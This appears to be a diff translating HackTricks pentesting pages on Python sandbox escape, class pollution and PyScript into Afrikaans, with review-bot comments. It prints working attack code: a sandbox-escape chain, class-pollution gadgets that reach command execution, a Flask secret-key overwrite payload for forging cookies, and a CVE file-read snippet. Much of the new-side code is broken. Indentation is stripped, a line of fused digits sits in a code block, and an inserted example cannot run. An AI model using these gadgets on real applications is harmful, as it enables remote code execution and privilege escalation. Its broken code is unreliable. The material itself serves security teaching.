@ -230,32 +217,29 @@ print(source)
|
|||
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
|
||||
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
|
||||
```
|
||||
|
||||
It basically does the following things, for those strings we get it from the `__dir__` method:
|
||||
|
||||
Dit doen basies die volgende dinge, vir daardie strings wat ons kry van die `__dir__` metode:
|
||||
```python
|
||||
getattr = (None).__getattribute__('__class__').__getattribute__
|
||||
builtins = getattr(
|
||||
getattr(
|
||||
getattr(
|
||||
[].__getattribute__('__class__'),
|
||||
'__base__'),
|
||||
'__subclasses__'
|
||||
)()[-2],
|
||||
getattr(
|
||||
getattr(
|
||||
[].__getattribute__('__class__'),
|
||||
'__base__'),
|
||||
'__subclasses__'
|
||||
)()[-2],
|
||||
'__repr__').__getattribute__('__globals__')['builtins']
|
||||
builtins['eval'](builtins['input']())
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
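Review bot: the line `12345678910111213...73` directly under the `nc challenge.server port` comment is a standalone row of fused line numbers inside the code fence and should be deleted. In the summary block, `getattr = (None).__getattribute__('__class__').__getattribute__` shadows the builtin `getattr`; a name such as `obj_getattr` makes the later `getattr(...)` calls read as the unbound `__getattribute__` they are rather than the builtin.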
@ -1,23 +1,22 @@
|
|||
# Class Pollution (Python's Prototype Pollution)
|
||||
# Klasverontreiniging (Python se Prototipeverontreiniging)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
## Basic Example
|
||||
|
||||
Check how is possible to pollute classes of objects with strings:
|
||||
## Basiese Voorbeeld
|
||||
|
||||
Kyk hoe dit moontlik is om klasse van voorwerpe met strings te verontreinig:
|
||||
```python
|
||||
class Company: pass
|
||||
class Developer(Company): pass
|
||||
|
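Review bot: Pick one Afrikaans term for "pollution" in the new line "Kyk hoe dit moontlik is om klasse van voorwerpe met strings te verontreinig:" and use it throughout the file; the same commit later renders the concept as "Vervuiling van ander klasse" (in the `globals` summary) and "Deur hierdie eienskap te besoedel" (in the `__kwdefaults__` paragraph), so a reader meets three different words for the page's one subject. "Verontreiniging" matches the other translated page ("Klasverontreiniging"), so standardising on it would be the smallest change.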
@ -41,9 +40,49 @@ e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company'
|
|||
print(d) #<__main__.Polluted_Developer object at 0x1041d2b80>
|
||||
print(c) #<__main__.Polluted_Company object at 0x1043a72b0>
|
||||
```
|
||||
## Basiese Kwesbaarheidsvoorbeeld
|
||||
|
||||
## Basic Vulnerability Example
|
||||
Consider the following Python code:
|
||||
|
||||
Beskou die volgende Python-kode:
|
||||
|
||||
```python
|
||||
class Person:
|
||||
def __init__(self, name, age):
|
||||
self.name = name
|
||||
self.age = age
|
||||
|
||||
person = Person("Alice", 25)
|
||||
print(person.name)
|
||||
```
|
||||
|
||||
This code defines a `Person` class with a constructor that takes in a `name` and an `age`. It then creates an instance of the `Person` class with the name "Alice" and age 25, and prints out the name of the person.
|
||||
|
||||
Hierdie kode definieer 'n `Person`-klas met 'n konstrukteur wat 'n `name` en 'n `age` aanvaar. Dit skep dan 'n instansie van die `Person`-klas met die naam "Alice" en ouderdom 25, en druk die naam van die persoon uit.
|
||||
|
||||
Now, let's say an attacker is able to modify the `Person` class prototype and add a new method called `get_password`:
|
||||
|
||||
Nou, stel ons sê 'n aanvaller kan die `Person`-klas se prototipe wysig en 'n nuwe metode genaamd `get_password` byvoeg:
|
||||
|
||||
```python
|
||||
Person.__dict__["get_password"] = lambda self: "password123"
|
||||
```
|
||||
|
||||
The attacker can then call the `get_password` method on the `person` instance:
|
||||
|
||||
Die aanvaller kan dan die `get_password`-metode op die `person`-instansie aanroep:
|
||||
|
||||
```python
|
||||
print(person.get_password())
|
||||
```
|
||||
|
||||
This will print out the string "password123", even though the `get_password` method was never defined in the original `Person` class.
|
||||
|
||||
Dit sal die string "password123" uitdruk, selfs al is die `get_password`-metode nooit in die oorspronklike `Person`-klas gedefinieer nie.
|
||||
|
||||
This is an example of class pollution or prototype pollution vulnerability. By modifying the class prototype, the attacker is able to add or modify methods and properties of the class at runtime, potentially leading to unauthorized access or manipulation of data.
|
||||
|
||||
Dit is 'n voorbeeld van 'n klasverontreiniging of prototipeverontreiniging-kwesbaarheid. Deur die klasprototipe te wysig, kan die aanvaller metodes en eienskappe van die klas byvoeg of wysig tydens uitvoering, wat moontlik kan lei tot ongemagtigde toegang of manipulasie van data.
|
||||
```python
|
||||
# Initial state
|
||||
class Employee: pass
|
||||
|
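Review bot: The whole "Basiese Kwesbaarheidsvoorbeeld" / "Basic Vulnerability Example" section that this hunk inserts (from `## Basiese Kwesbaarheidsvoorbeeld` down to "... manipulasie van data.") has no counterpart on the old side of the diff (the hunk header shows 9 old lines becoming 49) and should be dropped rather than translated: it is not part of the upstream page, and its core example `Person.__dict__["get_password"] = lambda self: "password123"` does not run, because a class's `__dict__` is a read-only `mappingproxy` and item assignment on it raises `TypeError`. The section also mislabels the issue as "prototype pollution"; the rest of the page correctly frames it as class pollution via the recursive `merge` gadget.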
@ -52,37 +91,35 @@ print(vars(emp)) #{}
|
|||
|
||||
# Vulenrable function
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
|
||||
USER_INPUT = {
|
||||
"name":"Ahemd",
|
||||
"age": 23,
|
||||
"manager":{
|
||||
"name":"Sarah"
|
||||
}
|
||||
"name":"Ahemd",
|
||||
"age": 23,
|
||||
"manager":{
|
||||
"name":"Sarah"
|
||||
}
|
||||
}
|
||||
|
||||
merge(USER_INPUT, emp)
|
||||
print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
|
||||
```
|
||||
|
||||
## Gadget Examples
|
||||
## Voorbeelde van Gadget
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Creating class property default value to RCE (subprocess)</summary>
|
||||
|
||||
<summary>Skep klas eienskap se verstekwaarde na RCE (subproses)</summary>
|
||||
```python
|
||||
from os import popen
|
||||
class Employee: pass # Creating an empty class
|
||||
|
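Review bot: The new version of this code block strips the leading indentation from the body of `merge` (the lines from `# Recursive merge function` to `setattr(dst, k, v)`) and from the `USER_INPUT` dict literal, so `def merge(src, dst):` is followed by an unindented body and the block now raises `IndentationError` instead of demonstrating the vulnerability. Restore the original indentation exactly as on the old side (the nested `if`/`elif`/`else` levels matter for the recursion), and check the same dedent has not happened in the other fenced blocks of this file. While here, the pre-existing typo in `# Vulenrable function` could become `# Vulnerable function`.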
@ -90,31 +127,31 @@ class HR(Employee): pass # Class inherits from Employee class
|
|||
class Recruiter(HR): pass # Class inherits from HR class
|
||||
|
||||
class SystemAdmin(Employee): # Class inherits from Employee class
|
||||
def execute_command(self):
|
||||
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
|
||||
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
|
||||
def execute_command(self):
|
||||
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
|
||||
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
|
||||
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
USER_INPUT = {
|
||||
"__class__":{
|
||||
"__base__":{
|
||||
"__base__":{
|
||||
"custom_command": "whoami"
|
||||
}
|
||||
}
|
||||
}
|
||||
"__class__":{
|
||||
"__base__":{
|
||||
"__base__":{
|
||||
"custom_command": "whoami"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
recruiter_emp = Recruiter()
|
||||
|
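Review bot: Same dedent problem in this hunk: the `execute_command` method body (`command = self.custom_command ...` and the `return f'[!] Executing: ...'` line) is no longer indented under `def execute_command(self):`, and the `merge` body and the nested `USER_INPUT` dict have lost their indentation too, so the RCE gadget example will not parse. Restore the indentation from the old side; the nested `"__class__"` / `"__base__"` / `"__base__"` structure of `USER_INPUT` is the whole point of the example and should stay visually nested.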
@ -129,30 +166,28 @@ merge(USER_INPUT, recruiter_emp)
|
|||
print(system_admin_emp.execute_command())
|
||||
#> [!] Executing: "whoami", output: "abdulrah33m"
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Polluting other classes and global vars through <code>globals</code></summary>
|
||||
|
||||
<summary>Vervuiling van ander klasse en globale vars deur middel van <code>globals</code></summary>
|
||||
```python
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
class User:
|
||||
def __init__(self):
|
||||
pass
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
class NotAccessibleClass: pass
|
||||
|
||||
|
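Review bot: The `merge` body and the `User.__init__` body (`def __init__(self):` followed by an unindented `pass`) are dedented in the new version of this block, so the `globals` pollution example no longer runs; restore the old-side indentation. The summary translation "Vervuiling van ander klasse en globale vars deur middel van `globals`" is fine on its own but should use the same word for "pollution" as the rest of the page (see the first hunk).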
@ -163,32 +198,30 @@ merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Pollut
|
|||
print(not_accessible_variable) #> Polluted variable
|
||||
print(NotAccessibleClass) #> <class '__main__.PollutedClass'>
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Arbitrary subprocess execution</summary>
|
||||
|
||||
<summary>Willekeurige onderprocesuitvoering</summary>
|
||||
```python
|
||||
import subprocess, json
|
||||
|
||||
class Employee:
|
||||
def __init__(self):
|
||||
pass
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
# Overwrite env var "COMSPEC" to execute a calc
|
||||
USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
|
||||
|
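Review bot: The `Employee.__init__` body and the `merge` body are dedented here as well, so this subprocess example will raise `IndentationError`; restore the old-side indentation. In the summary, "Willekeurige onderprocesuitvoering" should use the same term as the earlier summary "Skep klas eienskap se verstekwaarde na RCE (subproses)"; "subproses" also matches the `subprocess` module the example pollutes, so "Willekeurige subproses-uitvoering" reads more clearly.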
@ -197,39 +230,37 @@ merge(USER_INPUT, Employee())
|
|||
|
||||
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Overwritting <strong><code>__kwdefaults__</code></strong></summary>
|
||||
|
||||
**`__kwdefaults__`** is a special attribute of all functions, based on Python [documentation](https://docs.python.org/3/library/inspect.html), it is a “mapping of any default values for **keyword-only** parameters”. Polluting this attribute allows us to control the default values of keyword-only parameters of a function, these are the function’s parameters that come after \* or \*args.
|
||||
<summary>Oorskrywing van <strong><code>__kwdefaults__</code></strong></summary>
|
||||
|
||||
**`__kwdefaults__`** is 'n spesiale eienskap van alle funksies, gebaseer op Python [dokumentasie](https://docs.python.org/3/library/inspect.html), dit is 'n "afbeelding van enige verstekwaardes vir **slegs-sleutelwoord** parameters". Deur hierdie eienskap te besoedel, kan ons die verstekwaardes van slegs-sleutelwoord parameters van 'n funksie beheer, dit is die funksie se parameters wat na \* of \*args kom.
|
||||
```python
|
||||
from os import system
|
||||
import json
|
||||
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
class Employee:
|
||||
def __init__(self):
|
||||
pass
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
def execute(*, command='whoami'):
|
||||
print(f'Executing {command}')
|
||||
system(command)
|
||||
print(f'Executing {command}')
|
||||
system(command)
|
||||
|
||||
print(execute.__kwdefaults__) #> {'command': 'whoami'}
|
||||
execute() #> Executing whoami
|
||||
|
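Review bot: Three code bodies are dedented in this hunk: the `merge` body, `Employee.__init__` (`pass` no longer under `def __init__`), and `execute` (`print(f'Executing {command}')` and `system(command)` no longer under `def execute(*, command='whoami'):`), so the `__kwdefaults__` example fails to parse before it can show the polluted default. Restore the indentation from the old side. In the translated paragraph, "afbeelding" for "mapping" is unusual; since the surrounding text quotes the Python documentation, consider keeping the quoted phrase in English or using "toewysing".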
@ -242,24 +273,21 @@ print(execute.__kwdefaults__) #> {'command': 'echo Polluted'}
|
|||
execute() #> Executing echo Polluted
|
||||
#> Polluted
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Overwriting Flask secret across files</summary>
|
||||
|
||||
So, if you can do a class pollution over an object defined in the main python file of the web but **whose class is defined in a different file** than the main one. Because in order to access \_\_globals\_\_ in the previous payloads you need to access the class of the object or methods of the class, you will be able to **access the globals in that file, but not in the main one**. \
|
||||
Therefore, you **won't be able to access the Flask app global object** that defined the **secret key** in the main page:
|
||||
<summary>Oorskryf Flask-geheim regoor lêers</summary>
|
||||
|
||||
So, as jy 'n klasvervuiling kan doen oor 'n voorwerp wat in die hoof Python-lêer van die web gedefinieer is, **maar waarvan die klas in 'n ander lêer gedefinieer is** as die hoof een. Omdat jy in die vorige payloads toegang tot \_\_globals\_\_ moet hê, moet jy toegang tot die klas van die voorwerp of metodes van die klas hê, sal jy in staat wees om **die globals in daardie lêer te benader, maar nie in die hoof een nie**. \
|
||||
Daarom sal jy **nie toegang hê tot die Flask-app globale voorwerp** wat die **geheime sleutel** in die hoofbladsy gedefinieer het nie:
|
||||
```python
|
||||
app = Flask(__name__, template_folder='templates')
|
||||
app.secret_key = '(:secret:)'
|
||||
```
|
||||
In hierdie scenario het jy 'n toestel nodig om deur lêers te beweeg om by die hooflêer te kom om toegang te verkry tot die globale objek `app.secret_key` om die Flask-geheime sleutel te verander en sodoende [voorregte te verhoog deur hierdie sleutel te ken](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
|
||||
|
||||
In this scenario you need a gadget to traverse files to get to the main one to **access the global object `app.secret_key`** to change the Flask secret key and be able to [**escalate privileges** knowing this key](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
|
||||
|
||||
A payload like this one [from this writeup](https://ctftime.org/writeup/36082):
|
||||
'n Nutslading soos hierdie een [uit hierdie skryfstuk](https://ctftime.org/writeup/36082):
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```python
|
||||
|
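Review bot: The translated Flask paragraph is hard to follow: it keeps the English "So," at the start, and the middle sentence ("Omdat jy in die vorige payloads toegang tot \_\_globals\_\_ moet hê, moet jy toegang tot die klas ... hê, sal jy in staat wees ...") stacks two "moet" clauses before the main clause, which obscures the point that `__globals__` is reached through the object's class or its methods, and therefore only the globals of the file that defines that class are reachable, not the main file's. Also use one word for "payload": this hunk has "payloads" and "Nutslading" for the same thing, and the next hunk uses "payload" again.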
@ -267,30 +295,30 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
Use this payload to **change `app.secret_key`** (the name in your app might be different) to be able to sign new and more privileges flask cookies.
|
||||
Gebruik hierdie payload om **`app.secret_key`** (die naam in jou app mag verskil) te verander sodat jy nuwe en meer bevoorregte flask koekies kan teken.
|
||||
|
||||
</details>
|
||||
|
||||
Check also the following page for more read only gadgets:
|
||||
Kyk ook na die volgende bladsy vir meer slegs-lees gadgets:
|
||||
|
||||
{% content-ref url="python-internal-read-gadgets.md" %}
|
||||
[python-internal-read-gadgets.md](python-internal-read-gadgets.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
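Review bot: Inconsistent rendering of "github repos" within the same file: the footer here keeps "github repos" while the header translated earlier in this diff uses "github-opslagplekke" (and the next file's header uses "github-opslag"). Since these header/footer blocks are boilerplate repeated on every page, pick one form and apply it to all three copies in this commit.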
@ -2,79 +2,72 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
## PyScript Pentesting Guide
|
||||
## PyScript Pentesting Gids
|
||||
|
||||
PyScript is a new framework developed for integrating Python into HTML so, it can be used alongside HTML. In this cheat sheet, you'll find how to use PyScript for your penetration testing purposes.
|
||||
PyScript is 'n nuwe raamwerk wat ontwikkel is om Python in HTML te integreer, sodat dit saam met HTML gebruik kan word. In hierdie spiekbriefie sal jy vind hoe om PyScript te gebruik vir jou penetrasietoetsdoeleindes.
|
||||
|
||||
### Dumping / Retrieving files from the Emscripten virtual memory filesystem:
|
||||
### Dumping / Ophaling van lêers uit die Emscripten virtuele geheuebestandstelsel:
|
||||
|
||||
`CVE ID: CVE-2022-30286`\
|
||||
\
|
||||
Code:
|
||||
|
||||
Kode:
|
||||
```html
|
||||
<py-script>
|
||||
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
|
||||
out = fin.read()
|
||||
print(out)
|
||||
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
|
||||
out = fin.read()
|
||||
print(out)
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)
|
||||
|
||||
### [OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
|
||||
